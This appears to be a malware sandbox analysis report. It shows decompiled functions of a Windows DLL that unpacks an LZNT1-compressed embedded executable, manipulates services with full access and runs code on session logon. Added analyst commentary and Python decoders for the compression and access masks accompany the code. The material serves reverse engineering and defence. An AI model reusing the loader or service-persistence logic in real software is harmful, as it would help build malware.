    								_push(0x6ecae05c);
    								_push(1);
    								_push(0);
    								_push(0x6ecae0ac);
    								if( *_t158() >= 0) {
    									_t94 = _v124;
    									 *((intOrPtr*)( *((intOrPtr*)( *_t94 + 0x28))))(_t94, _t151);
    									_t97 = _v132;
    									 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 0x20))))(_t97, _t156);
    									_t99 = _v136;
    									_push(_v140);
    									_push(_t99);
    									if( *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x20))))() >= 0) {
    										_v128 = 1;
    									}
    									_t102 = _v148;
    									 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 8))))(_t102);
    								}
    								__imp__#6(_t156);
    							}
    						}
    						L21:
    						__imp__#6(_t151);
    						goto L22;
    					}
    					_t157 = _v52;
    					if(_t157 == 0) {
    						_t108 = _v100;
    						_v80 = 0;
    						 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0x44))))(_t108,  &_v80);
    						if(_v88 == 0) {
    							_t111 = _v108;
    							 *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x48))))(_t111, 0xffffffff);
    						}
    					}
    					_t104 = _v100;
    					_v80 = 1;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))(_t104);
    					if(_t157 != 0) {
    						_t106 = _v100;
    						 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x24))))(_t106, _t151);
    					}
    					goto L21;
    				}
    			}

    APIs
    • CoCreateInstance.OLE32(6ECAE0CC,00000000,00000001,6ECAE08C,?), ref: 6ECA4A4B
    • SysAllocString.OLEAUT32(?), ref: 6ECA4AE1
    • SysAllocString.OLEAUT32(?), ref: 6ECA4B6F
    • CoCreateInstance.OLE32(6ECAE0AC,00000000,00000001,6ECAE05C,?), ref: 6ECA4B89
    • SysFreeString.OLEAUT32(00000000), ref: 6ECA4BD3
    • SysFreeString.OLEAUT32(00000000), ref: 6ECA4BDA
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: String$AllocCreateFreeInstance
    • String ID:
    • API String ID: 391255401-0
    • Opcode ID: 7a30cc5bde6d54b9645f975009aaf7a9823a2b668b93c5b02116b92c11a286a3
    • Instruction ID: 9c1189f4969d3ca7f27679098b4c3c5abb13bb0801f3b5b03850ef75df3604f1
    • Opcode Fuzzy Hash: 7a30cc5bde6d54b9645f975009aaf7a9823a2b668b93c5b02116b92c11a286a3
    • Instruction Fuzzy Hash: CC61C0B52047429FD700DF99D890E5AB7E9BBC8308F104A5CF659CB250EB31EC46CB62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECA2260(CHAR* _a4, long* _a8) {
    				long _v4;
    				long _v8;
    				void* _t21;
    				long _t27;
    				intOrPtr* _t30;
    				void* _t33;
    
    				_t21 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
    				if(_t21 == 0xffffffff) {
    					return 0;
    				} else {
    					_t27 = GetFileSize(_t21, 0);
    					if(_t27 == 0) {
    						return 0;
    					} else {
    						_t33 = VirtualAlloc(0, _t27, 0x1000, 4);
    						if(_t33 == 0) {
    							L6:
    							return 0;
    						} else {
    							_v4 = 0;
    							ReadFile(_t21, _t33, _t27,  &_v4, 0);
    							CloseHandle(_t21);
    							_v8 = 0;
    							_t30 = E6ECA2190(_t33, _t27,  &_v8);
    							VirtualFree(_t33, 0, 0x8000);
    							if(_t30 == 0 ||  *_t30 != 0x5a4d) {
    								goto L6;
    							} else {
    								 *_a8 = _v8;
    								return _t30;
    							}
    						}
    					}
    				}
    			}

    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6ECA227C
    • GetFileSize.KERNEL32(00000000,00000000), ref: 6ECA2290
    • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 6ECA22A9
    • ReadFile.KERNEL32 ref: 6ECA22C7
    • CloseHandle.KERNEL32(00000000), ref: 6ECA22CE
      • Part of subcall function 6ECA2190: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 6ECA21BA
      • Part of subcall function 6ECA2190: RtlDecompressBuffer.NTDLL(00000002,00000000,?,?,?,?), ref: 6ECA21D1
      • Part of subcall function 6ECA2190: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6ECA21E5
    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6ECA22F5
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Virtual$File$AllocFree$BufferCloseCreateDecompressHandleReadSize
    • String ID:
    • API String ID: 3075244933-0
    • Opcode ID: 8dc8f2a639a2cd7b6601328b01a125ddc43356b89891f9825c6fcdc63d168528
    • Instruction ID: 976b4f5ee644e9e171a3bc424575327aad04f7d4a1b2f856d2765b19381bc560
    • Opcode Fuzzy Hash: 8dc8f2a639a2cd7b6601328b01a125ddc43356b89891f9825c6fcdc63d168528
    • Instruction Fuzzy Hash: 1421087520162167D6105AADAC48F8B7BACEBC6B26F104519FE14D3280E674D809CBF2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECA2190(void* _a4, long _a8, intOrPtr* _a12) {
    				long _v4;
    				long _v8;
    				intOrPtr* _v22;
    				long _v30;
    				intOrPtr _v42;
    				intOrPtr _t18;
    				long _t34;
    				void* _t35;
    				void* _t36;
    				void* _t37;
    
    				_t37 = _a4;
    				_t34 = _a8;
    				_v8 = 0;
    				_v4 = 0;
    				do {
    					_t36 = VirtualAlloc(0, _t34, 0x1000, 4);
    					if(_t36 == 0) {
    						goto L4;
    					} else {
    						if(RtlDecompressBuffer(2, _t36, _t34, _t37, _a8,  &_v8) != 0xc0000242) {
    							_t35 = VirtualAlloc(0, _v30, 0x1000, 4);
    							if(_t35 == 0) {
    								break;
    							} else {
    								RtlMoveMemory(_t35, _t36, _v30);
    								VirtualFree(_t36, 0, 0x8000);
    								 *_v22 = _v42;
    								return _t35;
    							}
    						} else {
    							VirtualFree(_t36, 0, 0x8000);
    							_t34 = _t34 + _t34;
    							goto L4;
    						}
    					}
    					L8:
    					L4:
    					_t18 = _v4 + 1;
    					_v4 = _t18;
    				} while (_t18 < 0x1e);
    				 *_a12 = _v8;
    				return 0;
    				goto L8;
    			}

    APIs
    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 6ECA21BA
    • RtlDecompressBuffer.NTDLL(00000002,00000000,?,?,?,?), ref: 6ECA21D1
    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6ECA21E5
    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 6ECA221D
    • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 6ECA222C
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?), ref: 6ECA2239
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Virtual$AllocFree$BufferDecompressMemoryMove
    • String ID:
    • API String ID: 201667072-0
    • Opcode ID: 2910cdd43503f19165f755d35be2497173dc7798f1ae11c8d363db893b5a177d
    • Instruction ID: 6a4a52eff26348ee7b59b526878f104c9d2f07e2183670ebee57a56e0d6949e7
    • Opcode Fuzzy Hash: 2910cdd43503f19165f755d35be2497173dc7798f1ae11c8d363db893b5a177d
    • Instruction Fuzzy Hash: 4B21C0712443126BD310CE5ADC41F6BB7E9FBC9B15F100919FB94E7284EB60E8098BB6
    Uniqueness

    Uniqueness Score: -1.00%
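
E6ECA2260 and E6ECA2190 together unpack an embedded image: the first reads a whole file into a VirtualAlloc'd buffer, the second calls RtlDecompressBuffer with format 2 (COMPRESSION_FORMAT_LZNT1), doubling the output buffer and retrying up to 0x1e times while the call returns 0xC0000242 (STATUS_BAD_COMPRESSION_BUFFER, the output-too-small status), copies the reported size into a fresh allocation, and returns it. Two details matter when reproducing this offline: the retry loop treats any status other than 0xC0000242 as success without checking for STATUS_SUCCESS, and E6ECA2260 accepts the result only if its first word is 0x5A4D ("MZ").

The decoder below is an added example for this report, not code from the sample. It implements LZNT1 as described in MS-XCA (a 2-byte chunk header, then flag bytes each governing eight tokens, with the offset/length split of a back-reference token depending on how much of the chunk is already decoded) and reproduces the MZ acceptance check; the four sample buffers were assembled by hand for the example and are not taken from the sample.

```python
"""LZNT1 decoder for the payload path E6ECA2260 -> E6ECA2190 above.

Added example, not code from the sample. RtlDecompressBuffer's first
argument there is 2 == COMPRESSION_FORMAT_LZNT1; this decoder follows the
LZNT1 layout from MS-XCA, and the sample buffers at the bottom were
assembled by hand for this example.
"""
import struct

MZ_SIGNATURE = 0x5A4D          # the `*_t30 != 0x5a4d` check in E6ECA2260


def _decompress_chunk(chunk, out):
    """Decode one compressed chunk into `out`; copies may overlap themselves."""
    start = len(out)
    pos = 0
    while pos < len(chunk):
        flags = chunk[pos]
        pos += 1
        for bit in range(8):            # one flag bit per token, LSB first
            if pos >= len(chunk):
                return
            if not (flags >> bit) & 1:  # literal byte
                out.append(chunk[pos])
                pos += 1
                continue
            token = struct.unpack_from("<H", chunk, pos)[0]
            pos += 2
            # Length bits shrink (and offset bits grow) as the chunk's
            # decoded size crosses 16, 32, 64, ... bytes.
            p = len(out) - start - 1
            len_bits = 12
            while p >= 0x10:
                p >>= 1
                len_bits -= 1
            length = (token & ((1 << len_bits) - 1)) + 3
            offset = (token >> len_bits) + 1
            if offset > len(out) - start:
                raise ValueError("back-reference reaches before the chunk")
            for _ in range(length):
                out.append(out[-offset])


def lznt1_decompress(data):
    """Return the decompressed bytes of an LZNT1 stream."""
    out = bytearray()
    pos = 0
    while pos + 2 <= len(data):
        header = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if header == 0:                 # a zero header ends the stream
            break
        size = (header & 0x0FFF) + 1    # bits 0-11: payload length - 1
        chunk = data[pos:pos + size]
        if len(chunk) != size:
            raise ValueError("truncated chunk at %#x" % (pos - 2))
        pos += size
        if header & 0x8000:             # bit 15: compressed chunk
            _decompress_chunk(chunk, out)
        else:                           # stored chunk, copied as-is
            out += chunk
    return bytes(out)


def unpack_embedded_pe(blob):
    """Decompress `blob` and return it only if it starts with 'MZ', as
    E6ECA2260 does; anything else yields None."""
    image = lznt1_decompress(blob)
    if len(image) < 2 or struct.unpack_from("<H", image, 0)[0] != MZ_SIGNATURE:
        return None
    return image


# Hand-assembled test vectors (constructed for this example, not from the sample).
# 0xB006: compressed, 7 payload bytes; flags 0x10 = four literals, then one
# token 0x3005 = offset 4, length 8 that overlaps its own output.
SAMPLE_SHORT = b"\x06\xb0\x10ABCD\x05\x30"
# 20 literals, then token 0x9803 = offset 20, length 6 read with 5 offset bits.
SAMPLE_LONG = b"\x18\xb0\x00ABCDEFGH\x00IJKLMNOP\x10QRST\x03\x98"
# 0x3002: stored chunk of 3 bytes (bit 15 clear).
SAMPLE_STORED = b"\x02\x30abc"
# Four literals that form a DOS header signature.
SAMPLE_MZ = b"\x04\xb0\x00MZ\x90\x00"
```

Feed the bytes that the sample reads in E6ECA2260 to `unpack_embedded_pe` and, if it returns an image, the next stop is the import directory that E6ECA175E above resolves.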

    C-Code - Quality: 94%
    			E6ECA38A0(char* _a4, char** _a8, int _a12, signed int _a16) {
    				char* _t5;
    				void* _t14;
    				int _t19;
    				void* _t24;
    				void* _t25;
    				signed int _t27;
    
    				_t19 = 0;
    				_t5 = OpenSCManagerA(0, 0, 0xf003f);
    				_t25 = _t5;
    				if(_t25 != 0) {
    					L2:
    					_t27 = _a16;
    					asm("sbb eax, eax");
    					_t24 = OpenServiceA(_t25, _a4, ( ~_t27 & 0xfff0fe05) + 0xf01ff);
    					if(_t24 == 0) {
    						L6:
    						CloseServiceHandle(_t25);
    						goto L7;
    					} else {
    						if(_t27 != 0) {
    							_t19 = 1;
    							goto L6;
    						} else {
    							_t14 = E6ECA37D0(_t24, _a8, _a12);
    							CloseServiceHandle(_t24);
    							CloseServiceHandle(_t25);
    							return _t14;
    						}
    					}
    				} else {
    					_t25 = OpenSCManagerA(_t5, _t5, 1);
    					if(_t25 == 0) {
    						L7:
    						return _t19;
    					} else {
    						goto L2;
    					}
    				}
    			}

    APIs
    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,00000000,00000000,6ECA709F,00000000,00000000,00000000,00000001,?,00000000), ref: 6ECA38B2
    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6ECA38BE
    • OpenServiceA.ADVAPI32(00000000,?,?,?), ref: 6ECA38E2
    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000000), ref: 6ECA3908
    • CloseServiceHandle.ADVAPI32(00000000), ref: 6ECA390F
    • CloseServiceHandle.ADVAPI32(00000000), ref: 6ECA3922
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Service$CloseHandleOpen$Manager
    • String ID:
    • API String ID: 4196757001-0
    • Opcode ID: da6d93c04fe583403c1f73d8a3bff03e7a19c508d220a9016867422f4f29c20d
    • Instruction ID: 91fbbf2db755ee61ea764b323a4f91de2ecc1356d1669bdbb2863d4303d804a2
    • Opcode Fuzzy Hash: da6d93c04fe583403c1f73d8a3bff03e7a19c508d220a9016867422f4f29c20d
    • Instruction Fuzzy Hash: B601D6B2705E166BD6115ABC9C589BFB7ACDFC5765F040529FA10D3200EB65CC054AA0
    Uniqueness

    Uniqueness Score: -1.00%
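
E6ECA38A0 first opens the service control manager with 0xF003F (SC_MANAGER_ALL_ACCESS) and, if that is refused, retries with 1 (SC_MANAGER_CONNECT), which every user is granted; it then opens the named service with an access mask computed by `sbb eax, eax` followed by `and 0xfff0fe05; add 0xf01ff`, which the decompiler renders as `(~_t27 & 0xfff0fe05) + 0xf01ff`. With the usual 0/-1 mask and 32-bit wrap-around that expression has only two outcomes, 0xF01FF (SERVICE_ALL_ACCESS) and 0x00000004 (SERVICE_QUERY_STATUS). When the caller's flag is non-zero the function just returns 1 if OpenServiceA succeeds (an existence check that works without elevation); when it is zero it hands the handle to E6ECA37D0, which is what the DELETE bit in SERVICE_ALL_ACCESS enables. Which flag value selects which mask is inferred from that control flow, not stated by the decompiler.

The decoder below is an added example for this report, not code from the sample. The bit values are the winnt.h/winsvc.h constants; `open_service_mask` reproduces the arithmetic so the two reachable masks can be read by name.

```python
"""Decode the service-control access masks requested in E6ECA38A0.

Added example, not code from the sample. Bit values are from winnt.h and
winsvc.h. open_service_mask() reproduces the `sbb eax, eax` idiom that the
decompiler rendered as `(~_t27 & 0xfff0fe05) + 0xf01ff`: with a 0/-1 mask
and 32-bit wrap-around the expression yields exactly two values.
"""
STANDARD_RIGHTS = {0x00010000: "DELETE", 0x00020000: "READ_CONTROL",
                   0x00040000: "WRITE_DAC", 0x00080000: "WRITE_OWNER",
                   0x00100000: "SYNCHRONIZE"}
SC_MANAGER_RIGHTS = {0x01: "SC_MANAGER_CONNECT", 0x02: "SC_MANAGER_CREATE_SERVICE",
                     0x04: "SC_MANAGER_ENUMERATE_SERVICE", 0x08: "SC_MANAGER_LOCK",
                     0x10: "SC_MANAGER_QUERY_LOCK_STATUS",
                     0x20: "SC_MANAGER_MODIFY_BOOT_CONFIG"}
SERVICE_RIGHTS = {0x001: "SERVICE_QUERY_CONFIG", 0x002: "SERVICE_CHANGE_CONFIG",
                  0x004: "SERVICE_QUERY_STATUS", 0x008: "SERVICE_ENUMERATE_DEPENDENTS",
                  0x010: "SERVICE_START", 0x020: "SERVICE_STOP",
                  0x040: "SERVICE_PAUSE_CONTINUE", 0x080: "SERVICE_INTERROGATE",
                  0x100: "SERVICE_USER_DEFINED_CONTROL"}
SC_MANAGER_ALL_ACCESS = 0xF003F      # first OpenSCManagerA call
SC_MANAGER_CONNECT = 0x1             # the fallback when that is refused
SERVICE_ALL_ACCESS = 0xF01FF


def decode_access(mask, specific_rights):
    """Names of the standard and object-specific bits set in `mask`,
    lowest bit first; unexpected bits are reported in hex."""
    names = []
    for table in (STANDARD_RIGHTS, specific_rights):
        for bit, name in sorted(table.items()):
            if mask & bit:
                names.append(name)
                mask &= ~bit
    if mask:
        names.append("unknown:%#x" % mask)
    return names


def open_service_mask(flag_is_nonzero):
    """Access passed to OpenServiceA. `neg eax; sbb eax, eax` leaves
    0xFFFFFFFF for a non-zero flag and 0 otherwise; the pairing of flag
    value and mask is inferred from the control flow, not stated by the
    decompiler."""
    m = 0xFFFFFFFF if flag_is_nonzero else 0
    return ((m & 0xFFF0FE05) + 0x000F01FF) & 0xFFFFFFFF


def describe_open_sequence(flag_is_nonzero):
    """Rights requested at each step of E6ECA38A0 for one caller flag."""
    return {
        "scm_first_try": decode_access(SC_MANAGER_ALL_ACCESS, SC_MANAGER_RIGHTS),
        "scm_fallback": decode_access(SC_MANAGER_CONNECT, SC_MANAGER_RIGHTS),
        "service": decode_access(open_service_mask(flag_is_nonzero), SERVICE_RIGHTS),
    }
```

`describe_open_sequence(True)` lists only SERVICE_QUERY_STATUS for the service handle, while `describe_open_sequence(False)` lists the full set including DELETE; the same decoder is handy for any other hard-coded access mask in the report, since decompilers print them as bare hex.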

    C-Code - Quality: 60%
    			E6ECA4FE0(intOrPtr _a4) {
    				char* _v0;
    				char _v264;
    				char _v272;
    				char* _t9;
    				int _t10;
    				void* _t11;
    				intOrPtr _t15;
    				void* _t21;
    				void* _t22;
    
    				_t21 =  &_v264;
    				_push(0x105);
    				_push( &_v264);
    				L6ECAC2EE();
    				_t9 = _v0;
    				if(_t9 == 0) {
    					_t9 = M6ECB0530; // 0xcb2c98
    				}
    				_t10 = wsprintfA( &_v272, "\"%s\"", _t9);
    				_t15 = _a4;
    				_t22 = _t21 + 0xc;
    				if(_t15 > 0) {
    					wsprintfA(_t22 + _t10 + 8, " w %d", _t15);
    					_t22 = _t22 + 0xc;
    				}
    				_t11 = M6ECB04D4; // 0x0
    				_push(_t11);
    				_push(0);
    				_push(0);
    				_push(0);
    				return E6ECA4EF0( &_v264, 1, 0);
    			}

    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: wsprintf$MemoryZero
    • String ID: w %d$"%s"
    • API String ID: 3693688802-504233264
    • Opcode ID: 85d3d98dbc2e7c089377809ab09a0fa529f2fb3465d595addb7d48523805b0f4
    • Instruction ID: 40a854051188d1d510c59b6bd1caef70249ceb3452d64cdacec905af3f85f597
    • Opcode Fuzzy Hash: 85d3d98dbc2e7c089377809ab09a0fa529f2fb3465d595addb7d48523805b0f4
    • Instruction Fuzzy Hash: 9BF0C27161430167D624DA9CDD82FD777AC6B84704F004819BB84DB185FAB1E548CBD2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			// Compiler-generated MSVC __security_init_cookie (seeds the /GS stack cookie), not sample logic:
    			// 0xbb40e64e is the default cookie value, 0x6ecb0264 holds the cookie and 0x6ecb0268 its complement.
    			E6ECAC13A() {
    				struct _FILETIME _v12;
    				signed int _v16;
    				union _LARGE_INTEGER _v20;
    				signed int _t14;
    				signed int _t16;
    				signed int _t17;
    				signed int _t18;
    				signed int _t22;
    				signed int _t23;
    				signed int _t32;
    
    				_t14 =  *0x6ecb0264; // 0x3322920a, already seeded in this memory dump
    				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
    				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
    				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
    					// Cookie still the default (or without high bits): mix time, PID, TID, tick count and QPC
    					GetSystemTimeAsFileTime( &_v12);
    					_t16 = GetCurrentProcessId();
    					_t17 = GetCurrentThreadId();
    					_t18 = GetTickCount();
    					QueryPerformanceCounter( &_v20);
    					_t22 = _v16 ^ _v20.LowPart;
    					_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
    					if(_t32 == 0xbb40e64e || ( *0x6ecb0264 & 0xffff0000) == 0) {
    						_t32 = 0xbb40e64f; // never leave the default value in place
    					}
    					 *0x6ecb0264 = _t32;
    					 *0x6ecb0268 =  !_t32; // __security_cookie_complement
    					return _t22;
    				} else {
    					_t23 =  !_t14;
    					 *0x6ecb0268 = _t23;
    					return _t23;
    				}
    			}

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6ECAC171
    • GetCurrentProcessId.KERNEL32 ref: 6ECAC17D
    • GetCurrentThreadId.KERNEL32 ref: 6ECAC185
    • GetTickCount.KERNEL32 ref: 6ECAC18D
    • QueryPerformanceCounter.KERNEL32(?), ref: 6ECAC199
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
    • String ID:
    • API String ID: 1445889803-0
    • Opcode ID: 7639529dd4233c566d6d5de92c46a686d807db5966695d777e6105bf242187e1
    • Instruction ID: e2fe40860b3c750c21897cf8f771087b6fbaf271abbb5c003da94268fec01e8c
    • Opcode Fuzzy Hash: 7639529dd4233c566d6d5de92c46a686d807db5966695d777e6105bf242187e1
    • Instruction Fuzzy Hash: 2F015E72D00A169BDF109FECC64869EBBB4EF4A355F520552FA11EB204E6309944CB81
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			// Service control handler: dispatches on the control code _a4 and reports through the
    			// SERVICE_STATUS_HANDLE at 0x6ecb0394. 0x6ecb043c is the SERVICE_STATUS block: +4 dwCurrentState
    			// (0x6ecb0440), +0xc dwWin32ExitCode (0x6ecb0448), +0x14 dwCheckPoint (0x6ecb0450), +0x18 dwWaitHint (0x6ecb0454).
    			E6ECA3A70(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				void* _t9;
    				intOrPtr _t13;
    				signed int* _t15;
    				signed int _t19;
    				signed int _t20;
    
    				_t9 = _a4 - 1;
    				if(_t9 > 0xd) {
    					// Control codes outside 1..0xe (SERVICE_CONTROL_STOP..SERVICE_CONTROL_SESSIONCHANGE): status reported unchanged
    					L10:
    					SetServiceStatus( *0x6ecb0394, 0x6ecb043c);
    					return 0;
    				}
    				// Jump table: index bytes at 0x6eca3b48, case addresses at M6ECA3B34. The byte table is not shown,
    				// so which control code reaches which case is inferred from the state each case sets.
    				switch( *((intOrPtr*)(( *(_t9 + 0x6eca3b48) & 0x000000ff) * 4 +  &M6ECA3B34))) {
    					case 0:
    						 *0x6ecb0440 = 1; // SERVICE_STOPPED
    						 *0x6ecb0448 = 0;
    						 *0x6ecb0450 = 0;
    						 *0x6ecb0454 = 0;
    						goto L10;
    					case 1:
    						 *0x6ecb0440 = 7; // SERVICE_PAUSED
    						goto L10;
    					case 2:
    						 *0x6ecb0440 = 4; // SERVICE_RUNNING
    						goto L10;
    					case 3:
    						// Consistent with SERVICE_CONTROL_SESSIONCHANGE: _a8 is dwEventType (5 = WTS_SESSION_LOGON)
    						// and _a12 a WTSSESSION_NOTIFICATION*, whose dwSessionId field sits at +4
    						if(_a8 == 5) {
    							_t13 = _a12;
    							_t20 = _t19 | 0xffffffff; // session id defaults to -1
    							if(_t13 != 0) {
    								_t20 =  *(_t13 + 4);
    							}
    							// Heap-allocated session id is handed to a new thread running E6ECA3930; the handle is closed at once
    							_t15 = HeapAlloc(GetProcessHeap(), 8, 4);
    							if(_t15 != 0) {
    								 *_t15 = _t20;
    								CloseHandle(CreateThread(0, 0, E6ECA3930, _t15, 0, 0));
    							}
    						}
    						goto L10;
    					case 4:
    						goto L10;
    				}
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000004), ref: 6ECA3AAA
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA3AB1
    • CreateThread.KERNEL32 ref: 6ECA3ACB
    • CloseHandle.KERNEL32(00000000), ref: 6ECA3AD2
    • SetServiceStatus.ADVAPI32(00000000,6ECB043C), ref: 6ECA3B26
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Heap$AllocCloseCreateHandleProcessServiceStatusThread
    • String ID:
    • API String ID: 3654718518-0
    • Opcode ID: b0220c7f68287f12eb2d1a9d569d581eab112dc617a3e8cb8c9aa9cca7356dca
    • Instruction ID: 67af5ebd7399c65f168ef762b87dabcb2a5b59584c293938118725543cdfd030
    • Opcode Fuzzy Hash: b0220c7f68287f12eb2d1a9d569d581eab112dc617a3e8cb8c9aa9cca7356dca
    • Instruction Fuzzy Hash: CE112770244A12EFEB109F9C9B2EB5E3BB5BB42318F014508FA559F1C0E774E8458F11
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			// Worker thread: after 3 s, if the first field of the context is 0 and a path is stored at +0x38,
    			// polls every 2 s until that file no longer exists, then runs E6ECA1C00, releases the buffer at +0x24
    			// and terminates the process. Which file is waited on is not shown in this section.
    			E6ECA2340(intOrPtr* _a4) {
    				intOrPtr* _t15;
    
    				Sleep(0xbb8); // 3000 ms
    				_t15 = _a4;
    				if( *_t15 == 0 &&  *(_t15 + 0x38) != 0) {
    					do {
    						Sleep(0x7d0); // 2000 ms
    					} while (GetFileAttributesA( *(_t15 + 0x38)) != 0xffffffff); // until INVALID_FILE_ATTRIBUTES
    					E6ECA1C00(_t15);
    					VirtualFree( *(_t15 + 0x24), 0, 0x8000); // MEM_RELEASE
    					 *(_t15 + 0x24) = 0;
    					ExitProcess(0);
    				}
    				return 0;
    			}

    APIs
    • Sleep.KERNEL32(00000BB8), ref: 6ECA234D
    • Sleep.KERNEL32(000007D0), ref: 6ECA236A
    • GetFileAttributesA.KERNEL32(00000000), ref: 6ECA2370
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 6ECA238B
    • ExitProcess.KERNEL32 ref: 6ECA239A
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Sleep$AttributesExitFileFreeProcessVirtual
    • String ID:
    • API String ID: 4254501734-0
    • Opcode ID: 094cf10c9fee4891e48dd1cee0425b2b980cc0af15e12f68584b19580f881a2d
    • Instruction ID: 54d218623c0fd3ca553816e696cec8d28146529676d98d0bfee06c1bcc1d206e
    • Opcode Fuzzy Hash: 094cf10c9fee4891e48dd1cee0425b2b980cc0af15e12f68584b19580f881a2d
    • Instruction Fuzzy Hash: 43F09A31600A11ABD750ABAECE84B8BB7B8BF4A738F110919F796931C0D7B0A440CE65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			// Shutdown helper: posts WM_CLOSE to the window whose handle is kept at 0x6ecb0398, waits up to
    			// 10 x 1 s for it to disappear, then terminates the process regardless.
